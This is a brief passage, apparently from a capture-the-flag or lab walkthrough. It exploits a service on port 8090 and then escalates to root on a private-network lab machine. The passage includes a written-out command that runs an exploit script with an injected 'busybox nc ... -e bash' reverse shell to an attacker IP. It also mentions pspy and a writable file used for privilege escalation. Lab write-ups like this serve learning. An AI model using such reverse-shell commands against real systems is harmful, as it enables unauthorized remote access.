8090

Using this exploit
python3 exploit.py -u http://192.168.241.41:8090/ -c 'busybox nc 192.168.45.166 8090 -e bash'
We get a shell
Running pspy: 

We can write to it: 
Now listening on our kali machine:
We get a shell as root.(Using penelope in picture).
Last updated
Was this helpful?